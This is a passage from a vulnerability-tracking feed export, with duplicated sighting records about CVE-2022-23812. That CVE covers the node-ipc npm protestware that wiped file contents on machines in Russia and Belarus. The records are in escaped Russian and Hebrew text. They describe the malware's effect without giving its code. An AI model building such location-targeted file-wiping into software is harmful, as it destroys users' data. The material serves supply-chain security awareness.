\u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0438\u043c\u0435\u0435\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440 \u0434\u043b\u044f \u044d\u043a\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u044b npm \u0438 \u0432\u044b\u0434\u0432\u0438\u0433\u0430\u0435\u0442 \u043d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u043b\u0430\u043d \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f: \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u044b\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u0434\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435 \u043d\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c.\n\n\u0422\u0430\u043a, \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043d\u044b\u0439 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a JavaScript \u00abVue.js\u00bb \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 node-ipc \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438, \u0438 \u0434\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u0431\u044b\u043b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0442\u043e\u0440\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0438 \u0432\u0435\u0440\u0441\u0438\u0439 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0447\u0435\u0433\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u0438 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 Protestware. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c Vue.js \u2014 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f node-ipc.\n\nSnyk \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0432\u0435\u0440\u0441\u0438\u0438 node-ipc 10.1.1 \u0438 10.1.2 \u0431\u044b\u043b\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u044b npm \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 24 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438, \u043e\u0434\u043d\u0430\u043a\u043e 11.0.0 \u0438 \u0432\u044b\u0448\u0435\u00a0\u0432\u0441\u0435 \u0435\u0449\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b, \u0430 \u0437\u043d\u0430\u0447\u0438\u0442 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u00a0Peacenotwar. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 node-ipc \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u00ab\u0437\u0430\u043c\u0435\u0441\u0442\u0438 \u0441\u043b\u0435\u0434\u044b\u00bb, \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u0443\u044f \u0438 \u0443\u0434\u0430\u043b\u044f\u044f\u00a0\u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438\u00a0\u0432 \u0432\u0435\u0442\u043a\u0435.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0441\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f\u00a0\u0430\u043a\u0446\u0438\u044f \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b RIAEvangelist, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442, \u043a \u0441\u043b\u043e\u0432\u0443, \u0431\u043e\u043b\u0435\u0435 40 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0432 npm, \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0440\u0435\u0437\u043a\u0443\u044e \u043a\u0440\u0438\u0442\u0438\u043a\u0443 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u041f\u041e \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0441\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u0440\u0438\u0437\u0438\u0441 \u0434\u043e\u0432\u0435\u0440\u0438\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0443\u043c. \n\n\u0412 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u041f\u041e \u043a \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u043c \u0432\u0435\u0440\u0441\u0438\u044f\u043c: \u0441 \u0443\u0447\u0435\u0442\u043e\u043c \u043d\u0435\u0433\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0439, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u044d\u0442\u043e \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.", "creation_timestamp": "2022-03-18T09:40:00.000000Z"} https://vulnerability.circl.lu/sighting/4f6982f5-c4cf-4e07-be48-dc2edb47688f/export Fri, 18 Mar 2022 09:40:00 +0000 https://vulnerability.circl.lu/sighting/08d48ced-1897-473f-ba9a-13d28d5543ef/export {"uuid": "08d48ced-1897-473f-ba9a-13d28d5543ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9084", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 CVE-2022-23812: RIAEvangelist/node-ipc is malware / protestware.\n\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c", "creation_timestamp": "2022-03-19T14:31:30.000000Z"} {"uuid": "08d48ced-1897-473f-ba9a-13d28d5543ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9084", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 CVE-2022-23812: RIAEvangelist/node-ipc is malware / protestware.\n\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c", "creation_timestamp": "2022-03-19T14:31:30.000000Z"} https://vulnerability.circl.lu/sighting/08d48ced-1897-473f-ba9a-13d28d5543ef/export Sat, 19 Mar 2022 14:31:30 +0000 https://vulnerability.circl.lu/sighting/07a6ff04-8f47-4173-8c4b-b409b3f4ab62/export {"uuid": "07a6ff04-8f47-4173-8c4b-b409b3f4ab62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityIL/10834", "content": "\u05de\u05e4\u05ea\u05d7 \u05e9\u05d0\u05d7\u05e8\u05d0\u05d9 \u05dc\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea \u05e4\u05d9\u05ea\u05d5\u05d7 \u05e4\u05d5\u05e4\u05dc\u05d0\u05e8\u05d9\u05ea \u05d4\u05d7\u05dc\u05d9\u05d8 \u05dc\u05de\u05d7\u05d5\u05ea \u05db\u05e0\u05d2\u05d3 \u05d4\u05de\u05dc\u05d7\u05de\u05d4 \u05d5\u05d4\u05e2\u05dc\u05d4 \u05d2\u05e8\u05e1\u05d4 \u05d6\u05d3\u05d5\u05e0\u05d9\u05ea \u05d4\u05de\u05d5\u05d7\u05e7\u05ea \u05de\u05d9\u05d3\u05e2 \u05e9\u05dc \u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05d1\u05e8\u05d5\u05e1\u05d9\u05d4 \u05d5\u05d1\u05dc\u05d0\u05e8\u05d5\u05e1.\n\n\u05d4\u05e1\u05e4\u05e8\u05d9\u05d4 - node-ipc \u05e0\u05de\u05e6\u05d0\u05ea \u05d1\u05e9\u05d9\u05de\u05d5\u05e9 \u05e8\u05d7\u05d1 \u05db\u05e9\u05d4\u05d9\u05d0 \u05d6\u05d5\u05db\u05d4 \u05dc\u05dc\u05de\u05e2\u05dc\u05d4 \u05de\u05de\u05d9\u05dc\u05d9\u05d5\u05df \u05d4\u05d5\u05e8\u05d3\u05d5\u05ea \u05d1\u05e9\u05d1\u05d5\u05e2, \u05db\u05e2\u05ea \u05d4\u05de\u05e4\u05ea\u05d7 \u05e9\u05de\u05e0\u05d4\u05dc \u05d0\u05ea \u05d4\u05e1\u05e4\u05e8\u05d9\u05d4 \u05d4\u05d7\u05dc\u05d9\u05d8 \u05dc\u05e4\u05e8\u05e1\u05dd \u05e2\u05d3\u05db\u05d5\u05df \u05d4\u05db\u05d5\u05dc\u05dc \u05e7\u05d5\u05d3 \u05d6\u05d3\u05d5\u05e0\u05d9 \u05d4\u05e4\u05d5\u05d2\u05e2 \u05d1\u05de\u05e4\u05ea\u05d7\u05d9\u05dd \u05d4\u05e0\u05de\u05e6\u05d0\u05d9\u05dd \u05d1\u05e8\u05d5\u05e1\u05d9\u05d4 \u05d5\u05d1\u05dc\u05d0\u05e8\u05d5\u05e1.\n\u05d4\u05e7\u05d5\u05d3 \u05d4\u05d6\u05d3\u05d5\u05e0\u05d9 \u05de\u05d1\u05e6\u05e2 \u05de\u05d7\u05d9\u05e7\u05d4 \u05e9\u05dc \u05db\u05dc \u05d4\u05ea\u05d5\u05db\u05df \u05e9\u05dc \u05d4\u05e7\u05d1\u05e6\u05d9\u05dd \u05d1\u05de\u05d7\u05e9\u05d1 \u05e9\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05d5\u05d1\u05de\u05e7\u05d5\u05de\u05dd \u05e9\u05dd \u05d0\u05d9\u05de\u05d5\u05d2'\u05d9 \u05e9\u05dc \u05dc\u05d1.\n\n\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05e9\u05d2\u05dd \u05d1\u05ea\u05e9\u05ea\u05d9\u05ea Vue.js CLI \u05d4\u05e4\u05d5\u05e4\u05dc\u05d0\u05e8\u05d9\u05ea \u05e2\u05d5\u05e9\u05d9\u05dd \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05e1\u05e4\u05e8\u05d9\u05d4 \u05d6\u05d5. \n\u05d4\u05e4\u05d2\u05d9\u05e2\u05d5\u05ea \u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05de\u05d6\u05d4\u05d4 CVE-2022-23812. \n\n#\u05e8\u05d5\u05e1\u05d9\u05d4_\u05d0\u05d5\u05e7\u05e8\u05d0\u05d9\u05e0\u05d4 #\u05e9\u05e8\u05e9\u05e8\u05ea_\u05d0\u05e1\u05e4\u05e7\u05d4 #\u05e7\u05d5\u05d3_\u05e4\u05ea\u05d5\u05d7\n\nhttps://t.me/CyberSecurityIL/1785\n\nhttps://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/", "creation_timestamp": "2022-03-24T21:46:24.000000Z"} {"uuid": "07a6ff04-8f47-4173-8c4b-b409b3f4ab62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityIL/10834", "content": "\u05de\u05e4\u05ea\u05d7 \u05e9\u05d0\u05d7\u05e8\u05d0\u05d9 \u05dc\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea \u05e4\u05d9\u05ea\u05d5\u05d7 \u05e4\u05d5\u05e4\u05dc\u05d0\u05e8\u05d9\u05ea \u05d4\u05d7\u05dc\u05d9\u05d8 \u05dc\u05de\u05d7\u05d5\u05ea \u05db\u05e0\u05d2\u05d3 \u05d4\u05de\u05dc\u05d7\u05de\u05d4 \u05d5\u05d4\u05e2\u05dc\u05d4 \u05d2\u05e8\u05e1\u05d4 \u05d6\u05d3\u05d5\u05e0\u05d9\u05ea \u05d4\u05de\u05d5\u05d7\u05e7\u05ea \u05de\u05d9\u05d3\u05e2 \u05e9\u05dc \u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05d1\u05e8\u05d5\u05e1\u05d9\u05d4 \u05d5\u05d1\u05dc\u05d0\u05e8\u05d5\u05e1.\n\n\u05d4\u05e1\u05e4\u05e8\u05d9\u05d4 - node-ipc \u05e0\u05de\u05e6\u05d0\u05ea \u05d1\u05e9\u05d9\u05de\u05d5\u05e9 \u05e8\u05d7\u05d1 \u05db\u05e9\u05d4\u05d9\u05d0 \u05d6\u05d5\u05db\u05d4 \u05dc\u05dc\u05de\u05e2\u05dc\u05d4 \u05de\u05de\u05d9\u05dc\u05d9\u05d5\u05df \u05d4\u05d5\u05e8\u05d3\u05d5\u05ea \u05d1\u05e9\u05d1\u05d5\u05e2, \u05db\u05e2\u05ea \u05d4\u05de\u05e4\u05ea\u05d7 \u05e9\u05de\u05e0\u05d4\u05dc \u05d0\u05ea \u05d4\u05e1\u05e4\u05e8\u05d9\u05d4 \u05d4\u05d7\u05dc\u05d9\u05d8 \u05dc\u05e4\u05e8\u05e1\u05dd \u05e2\u05d3\u05db\u05d5\u05df \u05d4\u05db\u05d5\u05dc\u05dc \u05e7\u05d5\u05d3 \u05d6\u05d3\u05d5\u05e0\u05d9 \u05d4\u05e4\u05d5\u05d2\u05e2 \u05d1\u05de\u05e4\u05ea\u05d7\u05d9\u05dd \u05d4\u05e0\u05de\u05e6\u05d0\u05d9\u05dd \u05d1\u05e8\u05d5\u05e1\u05d9\u05d4 \u05d5\u05d1\u05dc\u05d0\u05e8\u05d5\u05e1.\n\u05d4\u05e7\u05d5\u05d3 \u05d4\u05d6\u05d3\u05d5\u05e0\u05d9 \u05de\u05d1\u05e6\u05e2 \u05de\u05d7\u05d9\u05e7\u05d4 \u05e9\u05dc \u05db\u05dc \u05d4\u05ea\u05d5\u05db\u05df \u05e9\u05dc \u05d4\u05e7\u05d1\u05e6\u05d9\u05dd \u05d1\u05de\u05d7\u05e9\u05d1 \u05e9\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05d5\u05d1\u05de\u05e7\u05d5\u05de\u05dd \u05e9\u05dd \u05d0\u05d9\u05de\u05d5\u05d2'\u05d9 \u05e9\u05dc \u05dc\u05d1.\n\n\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05e9\u05d2\u05dd \u05d1\u05ea\u05e9\u05ea\u05d9\u05ea Vue.js CLI \u05d4\u05e4\u05d5\u05e4\u05dc\u05d0\u05e8\u05d9\u05ea \u05e2\u05d5\u05e9\u05d9\u05dd \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05e1\u05e4\u05e8\u05d9\u05d4 \u05d6\u05d5. \n\u05d4\u05e4\u05d2\u05d9\u05e2\u05d5\u05ea \u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05de\u05d6\u05d4\u05d4 CVE-2022-23812. \n\n#\u05e8\u05d5\u05e1\u05d9\u05d4_\u05d0\u05d5\u05e7\u05e8\u05d0\u05d9\u05e0\u05d4 #\u05e9\u05e8\u05e9\u05e8\u05ea_\u05d0\u05e1\u05e4\u05e7\u05d4 #\u05e7\u05d5\u05d3_\u05e4\u05ea\u05d5\u05d7\n\nhttps://t.me/CyberSecurityIL/1785\n\nhttps://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/", "creation_timestamp": "2022-03-24T21:46:24.000000Z"} https://vulnerability.circl.lu/sighting/07a6ff04-8f47-4173-8c4b-b409b3f4ab62/export Thu, 24 Mar 2022 21:46:24 +0000